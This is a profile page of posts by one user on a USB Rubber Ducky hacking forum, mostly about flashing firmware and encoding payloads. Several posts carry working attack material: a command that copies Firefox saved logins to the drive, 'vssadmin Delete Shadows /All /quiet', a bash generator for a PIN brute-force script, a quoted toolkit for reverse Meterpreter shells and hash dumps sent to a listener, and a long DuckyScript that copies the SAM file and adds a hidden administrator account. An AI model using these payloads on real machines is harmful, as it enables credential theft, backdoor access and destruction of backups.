Posts posted by shamwow
-
If I'm not mistaken, you have to take the microSD card out of the Ducky, and read it with an adapter on your computer. Then, put both the VID_PID_SWAPPER.exe and VIDPID.txt on the microSD card, and run the VID_PID_SWAPPER.exe. Basically what happens is the VID_PID_SWAPPER.exe picks a random VID/PID combination from the VIDPID.txt file, which is loaded with about 350 different combinations (so, no, you don't have to edit it). Once you run the exe, a VIDPID.bin file should be created on the microSD card, and that's what tells the Ducky what VID and PID to use.
Remember to run the EXE ON the microSD card, or else it won't do anything !
V3sth4cks153
thanks.
-
Thanks both :)
I had tried C_duck_v2.1 before but for some reason it wasn't working.
Annoyingly I've had to revert back to the original firmware though, I can't "eject" the USB part of the ducky in composite mode as the HID part of the ducky is still attached to the machine, so I'm going to need a 2nd USB device connected to the victim to get the payload off of and then eject from Windows.
c_duck_v2.1.hex works for me.
-
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Utils/VID_PID_SWAPPER_1.1
I hope this helps you !
V3sth4cks153
thanks, now how do i use it?
like how do i put that into the duck?
also, do i need to edit the VIDPID.txt? if so then what do i type in VIDPID.txt?
-
how do i use the VID_PID_SWAPPER in windows
and does anyone have a link to the compiled exe file?
-
use c_duck_v2.1.hex. it's multi os, has mass storage ability and is faster.
-
Hello All,
I just purchased two rubber ducky. I am new to this, but have been following the youtubes and reading a lot of posts.
Well my first attempt is to create the HELLO WORLD payload, but I am stuck at flashing the device.
I am following the instructions located at : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky
My System : Windows 7 64bit
1. I already have the following MS Visual C++ 2010 Red. (x64/x86) installed
2. I installed Flip
3. I had to manually install the Atmel Driver
4. Downloaded firmware duck_v2.hex (i assume this is twin duck) from https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images (right click > save-as > filetype (all files))
5. I ran program.bat duck_v2.hex and it FAILS as Parsing HEX file with error "Invalid HEX file syntax"
I have tried 3 other firmware images from the repo. but still same error on all of them :(
Can someone help me to what I am doing wrong? Thank you.
try downloading the zip file from https://github.com/midnitesnake/usb-rubber-ducky
also try putting program.bat and newfirmware.hex into c:\program files\flip_atmel\bin and then change to that directory in cmd prompt to run program.bat
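For the "Invalid HEX file syntax" failure discussed above, a quick way to tell whether a downloaded .hex is really Intel HEX before handing it to program.bat. This is an added example, not code from the thread or the firmware repository; `check_intel_hex` and the sample strings are constructed, and the idea that a browser "save as" can capture a web page instead of the raw image is an assumption the posters did not confirm.

```python
import binascii

# Constructed samples: two valid Intel HEX records, and the kind of HTML
# a browser saves when "save as" captures a web page instead of the raw file.
GOOD_HEX = ":10010000214601360121470136007EFE09D2190140\n:00000001FF\n"
SAVED_PAGE = "<!DOCTYPE html>\n<html><head><title>duck_v2.hex</title></head></html>\n"

def check_intel_hex(text):
    """Return [(line_no, problem), ...]; an empty list means the syntax is valid."""
    problems, saw_eof = [], False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if saw_eof:
            problems.append((n, "data after end-of-file record"))
            break
        if not line.startswith(":"):
            hint = " (looks like HTML, not firmware)" if line.startswith("<") else ""
            problems.append((n, "record does not start with ':'" + hint))
            break
        try:
            # Record layout after ':' is LL AAAA TT [data...] CC, all hex digits.
            rec = binascii.unhexlify(line[1:])
        except ValueError:  # binascii.Error is a ValueError subclass
            problems.append((n, "non-hex characters or odd number of digits"))
            continue
        if len(rec) < 5:
            problems.append((n, "record shorter than header plus checksum"))
            continue
        if rec[0] != len(rec) - 5:
            problems.append((n, "length byte does not match data size"))
        if sum(rec) & 0xFF:  # all bytes including checksum must sum to 0 mod 256
            problems.append((n, "checksum mismatch"))
        if rec[3] == 0x01:   # record type 01 marks end of file
            saw_eof = True
    if not saw_eof and not problems:
        problems.append((0, "missing end-of-file record"))
    return problems

if __name__ == "__main__":
    for name, sample in (("good", GOOD_HEX), ("saved page", SAVED_PAGE)):
        print(name, check_intel_hex(sample) or "OK")
```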
-
I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it?
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line.
also, first label your duck drive to the word "ducky" for the payload to work.
-
I should have been more specific in my post. The goal is to make it automated with little to no disruption. I would want to keep any shadows that are already on the system, but automatically create/dump/delete one.
why not delete them all and create a new one and use that new one? a batch file can delete them all then run vssown. you can use twin duck firmware as mass storage device too. i use the mimikatz payload to run an exe file that is on the ducky.
Here are some options..
vssadmin Delete Shadows /For=VolumeSpec [/Oldest] [/Quiet]
vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]
vssadmin Delete Shadows /All /quiet
Example Usage: vssadmin Delete Shadows /For=C: /Oldest /quiet
if you still want to delete a specific shadowcopy then use this one
vssadmin Delete Shadows /Shadow=ShadowID [/Quiet]
-
make a batch file and add this:
vssadmin Delete Shadows /All /quiet
-
DEFAULT_DELAY 75
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
-
I received my first Rubber Ducky on friday and have enjoyed playing with it and I am dreaming big with the abilities this thing has! I just have one problem, my payloads don't run automatically. They will run if I press the button but that's the only way. I put a delay in at the beginning of the code like suggested in the FAQs but that was not the problem. Any help would be very appreciated!
Firmware: Composite_Duck_S003.hex
Code:
REM Prints: Hello World!
DELAY 5000
STRING Test
DELAY 5000
STRING Hello Word
If you have any questions about the setup please let me know and I will answer them!
try c_duck_v2.1.hex and if you are printing hello world then where are you trying to print it? in cmd prompt or in notepad? maybe add one of them to that ducky script.
-
thanks for your kind words Oli. Everything you say makes me smile! :)
The project will cost 240 euros.
You will get constant running updates and every single piece of documentation. You may also get beta versions before you get the final v1!
I will try to deliver in 1 week from the time i get the rubber ducky! 2 weeks though to give me some cushion if code doesn't run the way i want it!
As soon as the crowd fund goal is met no more people will be able to join this project.
Edit: If you all can give me a show of hands who wants in it would be great. You obviously do not pay if the goal has not been met.
I'm in.
-
Isn't it the composite duck stuff in the link you originally posted?
https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Source
which version of composite duck is c_duck_v2.1.hex? is composite duck-multi the multi os version (c_duck_v2.1.hex) source or the multi payload version of the source?
it would be good too if someone could link me directly to the source i need instead of just posting the same link i just posted.
-
nice idea, i will do it. i will fund 50 euros.
-
I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
will this script work against windows 10 pins as it is?
-
This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability
Power Shell Scripts for the Hak5 Ducky
1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit
All payloads are written in powershell so nothing should be caught by AV
https://github.com/b00stfr3ak/power-ducky
Fast Meterpreter
Stores the meterpreter script on a web server, the ducky will then go grab the script using ssl and execute it on the victim's machine.
Reverse Meterpreter
Creates a reverse meterpreter shell through powershell injection
Dump Domain and Local Hashes
Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.
Dump Lsass Process
Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.
Dump Wifi Passwords
Dumps all available wifi profiles, and then dumps each file through a tcp socket
Wget Execute
Downloads a file and executes it on the victim's machine
how do i set this up to work in the ducky?
-
I'm trying to get my usb ducky to save the sam file to the flash drive as well as create a new admin user. I'm not really sure where I am going wrong here but if anyone has advice or a code that works it would be greatly appreciated!!!
DELAY 5000GUI rDELAY 750STRING powershell Start-Process notepad -Verb runAsENTERDELAY 750ENTERALT SPACEDELAY 750STRING mDELAY 750DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')ENTERSTRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTimeENTERSTRING $fileSaveDir = New-Item ($userDir) -ItemType DirectoryENTERSTRING $date = get-dateENTERSTRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"ENTERSTRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'ENTERSTRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"ENTERSTRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')ENTERSTRING $shadow = gwmi Win32_ShadowCopy 
| ? { $_.ID -eq $createShadow.ShadowID }ENTERSTRING $addSlash = $shadow.DeviceObject + ''ENTERSTRING cmd /c mklink C:\shadowcopy $addSlashENTERSTRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDirENTERSTRING Remove-Item -recurse -force 'C:\shadowcopy'ENTERSTRING Net User Admin tacos /ADDENTERSTRING Net LocalGroup Administrators Admin /ADDENTERDELAY 500STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v Admin /t REG_DWORD /d 0 /fENTERSTRING $Report >> $fileSaveDir'/ComputerInfo.html'ENTERSTRING function copy-ToZip($fileSaveDir){ENTERSTRING $srcdir = $fileSaveDirENTERSTRING $zipFile = 'C:\Windows\Report.zip'ENTERSTRING if(-not (test-path($zipFile))) {ENTERSTRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))ENTERSTRING (dir $zipFile).IsReadOnly = $false}ENTERSTRING $shellApplication = new-object -com shell.applicationENTERSTRING $zipPackage = $shellApplication.NameSpace($zipFile)ENTERSTRING $files = Get-ChildItem -Path $srcdirENTERSTRING foreach($file in $files) {ENTERSTRING $zipPackage.CopyHere($file.FullName)ENTERSTRING while($zipPackage.Items().Item($file.name) -eq $null){ENTERSTRING Start-sleep -seconds 1 }}}ENTERSTRING copy-ToZip($fileSaveDir)ENTERSTRING $usbPresent = 'False'ENTERSTRING do {ENTERSTRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY’ } | MeasureENTERSTRING if ($present.Count -ge 1){ENTERSTRING $usbPresent = 'True' }Else {ENTERSTRING $usbPresent = 'False'}}ENTERSTRING until ($usbPresent -eq 'True')ENTERSTRING $driveLetter = Get-WMIObject Win32_Volume | ? 
{ $_.Label -eq 'DUCKY’ } | select NameENTERSTRING move-item c:\Windows\Report.zip $driveLetter.NameENTERSTRING remove-item $fileSaveDir -recurseENTERSTRING Remove-Item $MyINvocation.InvocationNameENTERCTRL SDELAY 1500STRING C:\Windows\config-d04a8.ps1ENTERDELAY 750ALT F4DELAY 1500GUI rDELAY 750STRING powershell Start-Process cmd -Verb runAsENTERDELAY 1500STRING mode con:cols=14 lines=1ENTERALT SPACEDELAY 1500STRING mDELAY 1500DOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWDOWNARROWENTERSTRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$falseENTERDELAY 750STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1ENTERmake a batch file to start the powershell script and then have the batch file copy the files to the ducky drive.
-
I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images
no, i'm looking for the decompiled source code for c_duck_v2.1.hex. thanks anyways.
-
where is the sourcecode to twin duck c_duck_v2.1.hex firmware?
i can't find it here. https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Source
i only see mass storage. twin duck is supposed to be multi os.
-
Just use system restore to roll back to before you did what you did to break it. Seriously repairing a computer shouldn't cost you anything if you are using duckies etc,
I just tried system restore. didn't fix it.
-
try this
quote:
Once you've got your payload in a text file, you need to use the Duck Encoder to encode it. Then you have to place the inject.bin file (the encoded file) on the root of the Duck's Micro SD card. You can encode the file directly on your computer using the encoder.jar located here: https://github.com/midnitesnake/USB-Rubber-Ducky , or you use the online encoder: http://www.ducktoolkit.com/Encoder.jsp
I hope this helps !
-
that is not how to get chrome passwords. you should test your commands in command prompt or make a batch file before attempting to make a ducky script out of them.
-
If the ducky works in other machines, then it is something up with the system you are using. It could be a ton of things. Try a different USB Port. If that doesn't work, I am out of ideas.
you're right i broke my system somehow. new usb devices won't auto install drivers either on any of the ports. i will just take my pc in to the shop to get fixed if you don't know what else i can try. thanks for trying to help.
-
See if you can find a tool to "clean" the USB Store (old USB devices that have been plugged in) from your registry.
Then try again.
okay so i just tried what you said by using this guide to drivecleanup.exe http://www.techspot.com/community/topics/usb-drive-or-flash-problems-how-to-cleanup-and-remove-old-usb-storage-drivers.145884/
i also tried usboblivion http://www.cherubicsoft.com/en/projects/usboblivion
all drives installed new drivers but it still did not fix the issue.
change the keyboard language
in Classic USB Rubber Ducky
you will have to speak better english than that if you want someone to help you. I don't know what you are asking.
what language do you want to change to?
use duckencoder to change the language.
for usa the command is:
java -jar encoder.jar -i script.txt -o inject.bin -l us
for canadian:
java -jar encoder.jar -i script.txt -o inject.bin -l ca
for uk:
java -jar encoder.jar -i script.txt -o inject.bin -l uk
for german, i think it might be but not sure:
java -jar encoder.jar -i script.txt -o inject.bin -l gb